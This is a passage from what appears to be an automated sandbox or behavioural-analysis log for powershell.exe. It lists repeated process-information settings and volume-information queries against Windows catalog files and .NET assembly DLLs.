Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |